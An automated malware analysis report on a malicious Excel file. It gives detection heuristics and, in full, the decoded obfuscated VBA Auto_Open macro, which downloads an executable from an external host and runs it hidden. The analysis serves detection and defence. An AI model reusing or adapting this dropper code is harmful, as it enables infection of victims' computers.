Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58d5d20283e136a3…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 63.0 KB
Created: 2015-05-11 10:30:59
Authoring application: Microsoft Excel
First seen: 2016-03-27
MD5: 4f7dc558829c806681fdf3a16299ac0e
SHA-1: 60ca90a4bc19381b0c88b5e1ad0146853e662fad
SHA-256: 58d5d20283e136a320ee02a7f0789857fe14c39b6d7ab929e34c357210ddac5a
Risk Score: 376

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is an Excel document containing an Auto_Open VBA macro. This macro is designed to download a file from 'http://www.dilibuildcon.co.in/usr/osos.exe' and save it as 'Super.exe' in the user's application data directory. It then executes the downloaded file using ShellExecute. The presence of obfuscated code and the direct execution of a downloaded payload indicate malicious intent.

Heuristics (10)

  • ClamAV: Xls.Malware.Valyria-10008065-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Malware.Valyria-10008065-0
  • VBA macros detected [medium, 6 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • VBA downloads and writes a file to disk [critical, OLE_VBA_HTTP_DROP_EXEC]
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        Call N1Oq.write(jgP8u.responseBody)
  • Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        Call ShellExecute(Environ("appdata") & "\Super.exe", vbHide)
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    Matched line in script:
        Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro [low, OLE_VBA_AUTO]
    Matched line in script:
        Sub Auto_Open() 'now only one link will be downloaded and saved with name java12.exe and then java12.exe will be executed
  • Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
    Matched line in script:
        If DownloadFile(Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(100) & Chr(105) & Chr(108) & Chr(105) & Chr(112) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(100) & Chr(99) & Chr(111) & Chr(110) & Chr(46) & Chr(99) & Chr(111) & Chr(46) & Chr(105) & Chr(110) & Chr(47) & Chr(117) & Chr(115) & Chr(114) & Chr(47) & Chr(111) & Chr(115) & Chr(111) & Chr(115) & Chr(46) & Chr(101) & Chr(120) & Chr(101), Environ("appdata") & "\ …
  • Reference to ShellExecute API [high, SC_STR_SHELLEXEC]
  • Suspicious extracted artifact [high, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10949 bytes
SHA-256: 9be2cf4d19b758edb54a6d43a584eb07792062bd057cae2a73f2b42170457b12
Detection: ClamAV: No threats found
Obfuscation or payload: likely
149 of 218 identifiers look randomly generated (e.g. 'lBQYajGBfhNTnvlQLLKP') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
'Begin Code
    'Unload Me bro if u want to change icon go to here .
Sub Auto_Open() 'now only one link will be downloaded and saved with name java12.exe and then java12.exe will be executed
 Dim EOuVC As Integer
 If DownloadFile(Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(100) & Chr(105) & Chr(108) & Chr(105) & Chr(112) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(100) & Chr(99) & Chr(111) & Chr(110) & Chr(46) & Chr(99) & Chr(111) & Chr(46) & Chr(105) & Chr(110) & Chr(47) & Chr(117) & Chr(115) & Chr(114) & Chr(47) & Chr(111) & Chr(115) & Chr(111) & Chr(115) & Chr(46) & Chr(101) & Chr(120) & Chr(101), Environ("appdata") & "\Super.exe") = True Then
 Dim number As Integer
 number = 1
        Dim sampleString As String
        ' Evaluate number and branch to appropriate label.
        If number = 1 Then GoTo Line1 Else GoTo Line2
Line1:
        sampleString = "Number equals 1"
        GoTo LastLine
Line2:
        ' The following statement never gets executed because number = 1.
        sampleString = "Number equals 2"
LastLine:
        ' Write "Number equals 1" in the Debug window.
Call ShellExecute(Environ("appdata") & "\Super.exe", vbHide)
   
  End If

End Sub

Public Function k9LWXV0s(TV9tLUV As String, jx68LS As String) As String
    Dim QLnhigm As Integer
    Dim hpIed As Integer
    Dim EsiLk As Integer
    For EsiLk = 1 To Len(jx68LS)
GoTo cjDLA
cjDLA:
GoTo axsVQDKdlbGBCAFqxEU:
ftOCMkfIJqKPYNtCCB:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo dkrVjiyBEwUkdMvx
QJtbeybftDZmZLn:
EHzYngPyAUxCPavIwi = "gfGoFrvV"
GoTo HkRjUcCcnhzwTpNGC
vVsFTBSEIiQTNgdzV:
        QLnhigm = QLnhigm + Asc(Mid$(jx68LS, EsiLk, 1))
GoTo AwHLavxGQKoEQr
jSekgrIJfgqNuYoTbu:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo rQRSQVHAHmMyNRUL
NtdZNiYOdnVV:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo vVsFTBSEIiQTNgdzV
QFFssTcpQkPoFRFDxP:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo jSekgrIJfgqNuYoTbu
EuajjimYQYCOOeild:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo QJtbeybftDZmZLn
rQRSQVHAHmMyNRUL:
EHzYngPyAUxCPavIwi = "gfGoFrvV"
GoTo NtdZNiYOdnVV
dkrVjiyBEwUkdMvx:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo vLBEvUxcaIwRHy
AwHLavxGQKoEQr:
GoTo EuajjimYQYCOOeild
axsVQDKdlbGBCAFqxEU:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo QFFssTcpQkPoFRFDxP
HkRjUcCcnhzwTpNGC:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo ftOCMkfIJqKPYNtCCB
vLBEvUxcaIwRHy:
    Next EsiLk
    For EsiLk = 1 To Len(TV9tLUV)
GoTo ZWm
ZWm:
GoTo zZzKEQFdMQd:
pxbonDHJBbqiSA:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo QzESdxKylLihJqHu
RIVgOOCCdm:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo buaxPcPNHZQtdnt
BSTpqzQEixekD:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo QwrsqvgZgK
zZzKEQFdMQd:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo HOfFEUKNFeHmkRG
QnrtlKnRCxmG:
GoTo oBMvuiTvResardh
buaxPcPNHZQtdnt:
hahLZYosumLbSDlnH = "pCN"
GoTo BSTpqzQEixekD
HOfFEUKNFeHmkRG:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo RIVgOOCCdm
QwrsqvgZgK:
        hpIed = Asc(Mid$(TV9tLUV, EsiLk, 1)) - QLnhigm - EsiLk
GoTo QnrtlKnRCxmG
oBMvuiTvResardh:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo vtnFCZvTZVhkzUVfp
NdwPjeSyHIGL:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo pxbonDHJBbqiSA
vtnFCZvTZVhkzUVfp:
hahLZYosumLbSDlnH = "pCN"
GoTo NdwPjeSyHIGL
QzESdxKylLihJqHu:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo lBQYajGBfhNTnvlQLLKP
lBQYajGBfhNTnvlQLLKP:
        Do Until hpIed > 0
GoTo QgW
QgW:
GoTo PwCVeTzuvtyjckN:
CYZjsnQgzTmh:
lxatZwOoOaTmUsc = "soAQ"
GoTo CKLJOztAerqGKNEetmVD
FPyylYyUiwduh:
YYoegYxaECkZtkboz = "hUU"
GoTo KywqIFcyQdZk
DgzfDUuUgascy:
YYoegYxaECkZtkboz = "hUU"
GoTo tzvGYmuvFdY
bDHVgAOBoOlkMtLx:
             hpIed = 255 + hpIed
GoTo bBMGZVsOnfbnESo
tzvGYmuvFdY:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo aquwoNqUFBpKA
CKLJOztAerqGKNEetmVD:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo bDHVgAOBoOlkMtLx
PwCVeTzuvtyjckN:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo FPyylYyUiwduh
uQbpmUiHHj:
rsBaTxzgmFNDjefd = "Sah"
GoTo DgzfDUuUgascy
bBMGZVsOnfbnESo:
GoTo lIDhjPkpxn
lIDhjPkpxn:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo ccafCJQvHHQbeVxMFpQ
ccafCJQvHHQbeVxMFpQ:
lxatZwOoOaTmUsc = "soAQ"
GoTo uQbpmUiHHj
KywqIFcyQdZk:
rsBaTxzgmFNDjefd = "Sah"
GoTo CYZjsnQgzTmh
aquwoNqUFBpKA:
        Loop
GoTo vW
vW:
GoTo cKMhJNcmHUHuV:
ZwdGQDJdlaFBBAEqjq:
ykoNCztLIfBagcn = "Fbdmv"
GoTo vhwADvTxcLHwQGxLVii
LTJpkljoagnEfe:
GoTo kneDgLJrgAqhvF
hmIPQBONehk:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo APIsbdxafs
tmitKZuisPKopVqvDtZi:
ykoNCztLIfBagcn = "Fbdmv"
GoTo hmIPQBONehk
APIsbdxafs:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo YlKKmuHjCiGYy
vhwADvTxcLHwQGxLVii:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo qSARDHiHSMfcz
obbCKYzTyQoAp:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo gyvRBMSOarsN
YlKKmuHjCiGYy:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo kevfBlwCyJbqxyIgbEGm
kevfBlwCyJbqxyIgbEGm:
        k9LWXV0s = k9LWXV0s & Chr(hpIed)
GoTo LTJpkljoagnEfe
gyvRBMSOarsN:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo ZwdGQDJdlaFBBAEqjq
kneDgLJrgAqhvF:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo obbCKYzTyQoAp
cKMhJNcmHUHuV:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo tmitKZuisPKopVqvDtZi
qSARDHiHSMfcz:
    Next EsiLk
End Function

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
Function Area(x As Double, y As Double) As Double

Area = x * y

End Function
Function DownloadFile(sUrl As String, sDropTo As String) As Boolean
    Dim jgP8u As Object
    Dim N1Oq As Object
    On Error GoTo ErrHandle:
GoTo cqdPqMLoUmZdCdoiA:
cqdPqMLoUmZdCdoiA:
GoTo mfP
mfP:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo LQZOuCDBGelsV
zNJsGggGPcEYDb:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo StEyQAQGQQSfwK
ixSTeniLbuO:
    Call N1Oq.Close
GoTo cQwFGEJuovZ
LQZOuCDBGelsV:
hDayEALOezAJTOsH = "uN"
GoTo iyCFwVleNvyS
iyCFwVleNvyS:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo zNJsGggGPcEYDb
CQbvJwjJgfHoGsw:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo wHBTQnJiaViyNjQgDyce
StEyQAQGQQSfwK:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo nwUOsubhAIye
fksiNVQUaxELqCCRV:
hDayEALOezAJTOsH = "uN"
GoTo PpExhORmOShdMazzbjvY
AwkEvmAKtsgStPcrYpc:
    Call N1Oq.write(jgP8u.responseBody)
GoTo FtrlDAQtRYT
nwUOsubhAIye:
    Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
GoTo aYdNUcsSSiZbSsUzxfTo
VjudcPPrzLo:
    Call jgP8u.Open(Chr$(71) & Chr$(69) & Chr$(84), sUrl, 0)
GoTo nKdpdbUnkGqBGDOgh
nKdpdbUnkGqBGDOgh:
GoTo HUItV
HUItV:
    Call jgP8u.Send
GoTo DMlRvKrxQZOupqot
wHBTQnJiaViyNjQgDyce:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo fksiNVQUaxELqCCRV
PpExhORmOShdMazzbjvY:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo TqOGCOfuPDMkfIK
aYdNUcsSSiZbSsUzxfTo:
    Set N1Oq = CreateObject(Chr$(65) & Chr$(100) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(46) & Chr$(83) & Chr$(116) & Chr$(114) & Chr$(101) & Chr$(97) & Chr$(109))
GoTo VjudcPPrzLo
DMlRvKrxQZOupqot:
    N1Oq.Type = 1
GoTo QfIkUlprjIl
lBFIzZogQyAV:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo CQbvJwjJgfHoGsw
FtrlDAQtRYT:
    Call N1Oq.SaveToFile(sDropTo, 2)
GoTo ixSTeniLbuO
cQwFGEJuovZ:
GoTo lBFIzZogQyAV
QfIkUlprjIl:
    Call N1Oq.Open
GoTo AwkEvmAKtsgStPcrYpc
qSARD:
GoTo vyBtShaKsuO:
qNImoUbuCrQ:
GoTo SRQHNVmMLcRUMlOtrZN
pQlPoGgGRL:
    Exit Function
GoTo MkTekgsIYf
pPqBvNKhCcTP:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo sHdQaxsVYE
embGPQOTrxEjwvLPRJjy:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo Bbmg
Bbmg:
GoTo bIKfHMaQFSssT
MkTekgsIYf:
ErrHandle:
GoTo qNImoUbuCrQ
SRQHNVmMLcRUMlOtrZN:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo ZOdnVVIJktF
TqOGCOfuPDMkfIK:
    DownloadFile = True
GoTo qSARD
lrKSHojjinYQYCdO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo NFBNd
NFBNd:
GoTo wJTpCqcDaZAiz
BgEQjQTNgdA:
qoteQfIkUlprjIlP = "peypg"
GoTo uAwIZavxGeLp
sHdQaxsVYE:
qoteQfIkUlprjIlP = "peypg"
GoTo embGPQOTrxEjwvLPRJjy
vyBtShaKsuO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo HuFcX
HuFcX:
GoTo pPqBvNKhCcTP
uAwIZavxGeLp:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo lrKSHojjinYQYCdO
GoTo Ci
Ci:
ZOdnVVIJktF:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo IQ
IQ:
GoTo BgEQjQTNgdA
bIKfHMaQFSssT:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo pQlPoGgGRL
wJTpCqcDaZAiz:
    DownloadFile = False
End Function
Public Function ShellExecute(ByVal RPVDuDd As String, ByVal yLPTJ As VbAppWinStyle) As Boolean
    On Error GoTo ErrHandle
GoTo Achy
Achy:
GoTo OidRxGHFKvpwan:
MrDDSQaQqFyiPSnP:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo ieNbAAbkqRmQpHhHSMf
CURoKjbQjzOkYhEzd:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo LgltjOQYVby
lfxvRnLRNadrM:
qskJmQBxlFwnBLut = "TuQ"
GoTo YidGVoIcVLrABzEpip
OidRxGHFKvpwan:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo RcwKxkKhgIpHtxQx
LgltjOQYVby:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MrDDSQaQqFyiPSnP
MoKQlSkVaA:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo lfxvRnLRNadrM
PusaOjZPeoQQ:
ErrHandle:
GoTo KluGjChFYjYUOheBl
RcwKxkKhgIpHtxQx:
qskJmQBxlFwnBLut = "TuQ"
GoTo CURoKjbQjzOkYhEzd
KuqfzqhuEnn:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MoKQlSkVaA
BxJabwyHfMpFms:
GoTo TIpkkjoZRZDePgjmeC
TIpkkjoZRZDePgjmeC:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo KuqfzqhuEnn
ieNbAAbkqRmQpHhHSMf:
    Call CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110)).ShellExecute(RPVDuDd, vbNullString, vbNullString, vbNullString, yLPTJ)
GoTo lUflhtJZgirOJnpVcv
KluGjChFYjYUOheBl:
    ShellExecute = False
GoTo BxJabwyHfMpFms
lUflhtJZgirOJnpVcv:
    ShellExecute = True
GoTo sYTTSYIOQnNMdSVN
sYTTSYIOQnNMdSVN:
    Exit Function
GoTo PusaOjZPeoQQ
YidGVoIcVLrABzEpip:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo CGJAaphRzBQz
CGJAaphRzBQz:
End Function